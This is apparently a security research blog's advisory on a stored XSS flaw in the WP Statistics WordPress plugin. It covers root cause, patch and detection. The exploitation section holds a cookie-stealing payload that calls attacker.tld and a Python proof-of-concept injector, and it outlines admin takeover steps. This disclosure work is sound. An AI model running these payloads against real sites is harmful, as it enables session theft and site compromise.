home intel cve-2026-5231-wp-statistics-stored-xss-utm-source
CVE Analysis 2026-04-17 · 7 min read

CVE-2026-5231: WP Statistics utm_source Stored XSS via innerHTML Sink

WP Statistics ≤14.16.4 copies raw utm_source into source_name on wildcard channel match, then renders it via innerHTML in admin chart legends — no escaping, no authentication required.

#cross-site-scripting#stored-xss#wordpress-plugin#input-sanitization#output-escaping
Technical mode — for security professionals
▶ Attack flow — CVE-2026-5231 · Remote Code Execution
ATTACKERRemote / unauthREMOTE CODE EXECCVE-2026-5231Cross-platform · HIGHCODE EXECArbitrary coderuns as targetCOMPROMISEFull accessNo confirmed exploits

Vulnerability Overview

CVE-2026-5231 is a stored cross-site scripting vulnerability in the WP Statistics WordPress plugin affecting all versions through 14.16.4. An unauthenticated attacker can inject arbitrary JavaScript by supplying a crafted utm_source query parameter in any page request. The payload survives two serialization boundaries — HTTP request to database, database to rendered admin page — because neither boundary applies HTML escaping to the referral source name. The script executes in the context of the administrator's browser session the next time they visit the Referrals Overview or Social Media analytics pages.

CVSS 7.2 (HIGH) is appropriate: exploitation requires no credentials, but impact is constrained to the admin panel context. In practice, XSS in a WordPress admin page is frequently a stepping stone to PHP code execution via plugin/theme editor or nonce-authenticated AJAX endpoints.

Affected Component

Two subsystems are responsible:

  • Referral parserWP_Statistics\Hits::record() and the channel-matching logic inside WP_Statistics\GeoIP\Referred::get_source_name(). This runs on every frontend page load.
  • Chart renderer — the JavaScript bundle that reads referral rows from a REST/AJAX endpoint and inserts legend labels with innerHTML rather than textContent.

The database table involved is {prefix}statistics_visitor, specifically the referred column, which stores the full referrer URL, and the companion view/aggregate table that stores the resolved source_name.

Root Cause Analysis

The referral parser walks a list of configured channel definitions. Each channel has an optional domains allowlist. When a channel is configured with a wildcard (*) domain entry, the code falls through to copying the caller-supplied UTM parameter directly into source_name without sanitization.


/**
 * Reconstructed pseudocode: WP_Statistics\GeoIP\Referred::get_source_name()
 * Approximates plugin PHP logic in C-style pseudocode for clarity.
 */
char *get_source_name(http_request_t *req, channel_list_t *channels) {
    const char *utm_source = get_query_param(req, "utm_source"); // attacker-controlled
    const char *referrer   = get_header(req, "Referer");

    for (int i = 0; i < channels->count; i++) {
        channel_t *ch = &channels->entries[i];

        if (domain_matches(referrer, ch->domains)) {
            return sanitize_and_copy(ch->label); // safe path: known domain
        }

        if (ch->wildcard_enabled) {              // wildcard channel configured
            if (utm_source != NULL) {
                // BUG: utm_source is copied verbatim into source_name;
                //      no wp_kses(), no esc_attr(), no htmlspecialchars()
                return strdup(utm_source);       // raw attacker input persists to DB
            }
            return strdup(ch->label);
        }
    }
    return parse_domain_from_referrer(referrer); // fallback
}

The stored source_name value is later fetched by a REST endpoint (/wp-json/wp-statistics/v2/referrals) and consumed by the frontend chart renderer. The renderer builds legend HTML with direct string concatenation into innerHTML:


/**
 * Reconstructed pseudocode: chart legend builder (JavaScript → C-style)
 * Mirrors the pattern in WP Statistics' Chartist/Chart.js integration layer.
 */
void render_referral_legend(chart_t *chart, referral_row_t *rows, int count) {
    char legend_html[MAX_LEGEND_SIZE] = {0};
    char entry_buf[512];

    for (int i = 0; i < count; i++) {
        // BUG: source_name inserted into HTML string without escaping;
        //      equivalent JS: legendEl.innerHTML += `
  • ${row.source_name}
  • ` snprintf(entry_buf, sizeof(entry_buf), "
  • " "" "%s" // <-- source_name dropped in raw "
  • ", rows[i].color, rows[i].source_name); // attacker-controlled, unescaped strlcat(legend_html, entry_buf, MAX_LEGEND_SIZE); } // Equivalent to: document.getElementById('legend').innerHTML = legend_html; set_element_inner_html(chart->legend_element, legend_html); // XSS sink }
    Root cause: The wildcard channel branch in the referral parser promotes the raw utm_source query parameter to a persistent source_name record without HTML encoding, and the chart legend renderer later writes that value to the DOM via innerHTML instead of textContent.

    Exploitation Mechanics

    
    EXPLOIT CHAIN:
    
    1. INJECT PHASE (unauthenticated, one HTTP request):
       GET /?utm_source=<img src=x onerror=fetch(`https://attacker.tld/c?k=`+document.cookie)> HTTP/1.1
       Host: target-wordpress.example.com
    
       - Plugin's hit recording fires on the frontend page load
       - get_source_name() matches wildcard channel (no domain restriction)
       - Raw utm_source value written to wp_statistics_visitor.referred /
         source_name aggregate column — payload now persisted in DB
    
    2. DORMANT STATE:
       - Payload sits in the referral statistics table
       - Survives across requests; no TTL unless admin manually purges stats
    
    3. TRIGGER PHASE (victim: authenticated administrator):
       - Admin navigates to:
           /wp-admin/admin.php?page=wps_referrals_overview
         OR
           /wp-admin/admin.php?page=wps_social_media
       - Page JS fetches /wp-json/wp-statistics/v2/referrals (or equivalent AJAX)
       - JSON response includes source_name with raw HTML payload
       - Chart legend renderer: legendEl.innerHTML += `
  • ${source_name}
  • ` - Browser parses injected tag, fires onerror handler 4. IMPACT (examples): a. Session hijack: exfiltrate document.cookie to attacker C2 b. Credential theft: inject fake wp-login overlay, harvest password c. Backdoor: use admin nonce + AJAX to install malicious plugin POST /wp-admin/admin-ajax.php action=install-plugin d. Persistence: wp_insert_user() via REST to create shadow admin

    A minimal proof-of-concept request demonstrating the injection:

    
    #!/usr/bin/env python3
    # CVE-2026-5231 — WP Statistics utm_source stored XSS injector
    # Usage: python3 poc.py https://target.example.com [callback_url]
    
    import sys, requests, urllib.parse
    
    TARGET  = sys.argv[1].rstrip('/')
    CB      = sys.argv[2] if len(sys.argv) > 2 else "https://attacker.tld/collect"
    
    # Payload: exfiltrate cookies + current URL on load
    PAYLOAD = (
        ''
    ).format(cb=CB)
    
    params = {
        "utm_source":   PAYLOAD,
        "utm_medium":   "referral",
        "utm_campaign": "test",
    }
    
    # Any page on the target site triggers hit recording
    r = requests.get(TARGET + "/", params=params, timeout=10)
    print(f"[*] Request sent — HTTP {r.status_code}")
    print(f"[*] Payload length: {len(PAYLOAD)} bytes")
    print(f"[*] Encoded UTM:    {urllib.parse.quote(PAYLOAD)[:80]}...")
    print("[!] Payload now stored. Awaiting admin page load.")
    

    Memory Layout

    This is a DOM-based stored XSS, so "memory" is the browser's DOM tree and the plugin's database row rather than heap memory. The relevant data flow across persistence boundaries is:

    
    DATA FLOW — PAYLOAD THROUGH PERSISTENCE BOUNDARIES:
    
    ┌─────────────────────────────────────────────────────────────────┐
    │ BOUNDARY 1: HTTP → PHP (no sanitization)                        │
    │                                                                 │
    │  $_GET['utm_source']                                            │
    │  = ''                             │
    │       │                                                         │
    │       ▼  get_source_name() — wildcard branch, raw strdup()      │
    │  $source_name = ''  ← UNSANITIZED │
    └─────────────────────────────────────────────────────────────────┘
                           │
                           ▼  $wpdb->insert() / update_option()
    ┌─────────────────────────────────────────────────────────────────┐
    │ BOUNDARY 2: PHP → MySQL (parameterized, but content is raw HTML)│
    │                                                                 │
    │  wp_statistics_visitor row:                                     │
    │    id          | INT  | 4821                                    │
    │    referred    | TEXT | https://...?utm_source=  │
    │    source_name | TEXT |   ← STORED│
    │    hits        | INT  | 1                                       │
    └─────────────────────────────────────────────────────────────────┘
                           │
                           ▼  REST API JSON response
    ┌─────────────────────────────────────────────────────────────────┐
    │ BOUNDARY 3: MySQL → JSON → JavaScript (no output escaping)      │
    │                                                                 │
    │  {"source_name": "", ...}         │
    │       │                                                         │
    │       ▼  legendEl.innerHTML += `
  • ${data.source_name}
  • ` │ │ │ │ DOM AFTER INSERTION: │ │
      │ │
    • │ │ │ │ │ ← XSS FIRES │
    • │ │
    │ └─────────────────────────────────────────────────────────────────┘

    Note that SQL parameterization correctly prevents SQL injection — the payload transits the database safely. The vulnerability is entirely in the missing HTML context encoding at ingress and the innerHTML sink at render time.

    Patch Analysis

    A correct fix requires sanitization at both boundaries: at write time (defense-in-depth) and at render time (the mandatory fix). Patching only one boundary is insufficient.

    
    // ── BEFORE (vulnerable) ── get_source_name(), wildcard branch:
    if (ch->wildcard_enabled) {
        if (utm_source != NULL) {
            return strdup(utm_source);   // raw input, no sanitization
        }
    }
    
    // ── AFTER (patched) ── sanitize at ingress with WordPress APIs:
    if (ch->wildcard_enabled) {
        if (utm_source != NULL) {
            // sanitize_text_field() strips tags, encodes <, >, &, "
            // Equivalent PHP: sanitize_text_field( wp_unslash( $utm_source ) )
            char *clean = sanitize_text_field(wp_unslash(utm_source));
            return strdup(clean);        // safe: no HTML special chars survive
        }
    }
    
    
    // ── BEFORE (vulnerable) ── chart legend renderer (JavaScript):
    //   legendEl.innerHTML += `
  • ${row.source_name}
  • `; // ── AFTER (patched) ── use textContent for untrusted data, // or escape before insertion: // Option A — preferred, no innerHTML for untrusted strings: const li = document.createElement('li'); const span = document.createElement('span'); span.className = 'color'; span.style.background = row.color; // color is hex-validated server-side li.appendChild(span); li.appendChild(document.createTextNode(row.source_name)); // textContent: safe legendEl.appendChild(li); // Option B — escape helper (acceptable if Option A is not feasible): function escHtml(s) { return s.replace(/&/g,'&') .replace(//g,'>') .replace(/"/g,'"') .replace(/'/g,'''); } // legendEl.innerHTML += `
  • ${escHtml(row.source_name)}
  • `;

    Additionally, the REST endpoint returning referral data should apply esc_html() to source_name values before serializing to JSON, ensuring that any legacy unescaped rows already in the database are neutralized at output time regardless of when they were written.

    Detection and Indicators

    Server-side (access logs): Look for utm_source values containing HTML metacharacters in GET requests to any WordPress frontend URL:

    
    # Grep pattern for Apache/Nginx combined log format:
    grep -E 'utm_source=[^&" ]*[<>"'\''&][^&" ]*' /var/log/nginx/access.log
    
    # Suspicious example lines:
    203.0.113.42 - - [01/Jun/2026:14:22:01 +0000] "GET /?utm_source=%3Cimg+src%3Dx+onerror%3D... HTTP/1.1" 200 -
    198.51.100.7 - - [01/Jun/2026:14:22:44 +0000] "GET /?utm_source=%3Cscript%3E... HTTP/1.1" 200 -
    

    Database: Query for stored payloads directly:

    
    SELECT id, referred, source_name, created
    FROM   wp_statistics_visitor
    WHERE  source_name REGEXP '[<>"'\'']'
       OR  source_name LIKE '%onerror%'
       OR  source_name LIKE '%javascript:%'
       OR  source_name LIKE '%

    WAF signatures: Block or sanitize utm_source parameters at the edge containing <, >, javascript:, onerror, onload. ModSecurity rule 942100 (SQL injection) will not fire here — a dedicated XSS rule set (e.g., OWASP CRS 941xxx rules) is required.

    Browser-side: A Content Security Policy header preventing inline event handlers would break most practical payloads:

    
    Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none';
    

    WP Statistics does not set CSP headers, leaving the admin panel fully exposed.

    Remediation

    • Update immediately: Apply the vendor patch released after 14.16.4. The fix is in the referral ingestion path and the chart rendering template.
    • Purge existing payloads: Run the detection query above and DELETE or sanitize affected rows in wp_statistics_visitor before upgrading. Legacy rows will re-trigger XSS on vulnerable installs even after the code is patched if the output-side fix is not in place.
    • Edge sanitization: Deploy a WAF rule to strip HTML metacharacters from UTM parameters before they reach WordPress. This is a compensating control, not a substitute for the code fix.
    • Reduce attack surface: Restrict the WP Statistics admin pages to IP allowlists using wp-admin IP filtering if the update cannot be applied immediately.
    • Audit custom channels: If wildcard domain entries are present in the WP Statistics channel configuration, consider removing them or replacing them with explicit domain lists to eliminate the vulnerable code path entirely.
    CB
    CypherByte Research
    Mobile security intelligence · cypherbyte.io
    // WEEKLY INTEL DIGEST

    Get articles like this every Friday — mobile CVEs, threat research, and security intelligence.

    Subscribe Free →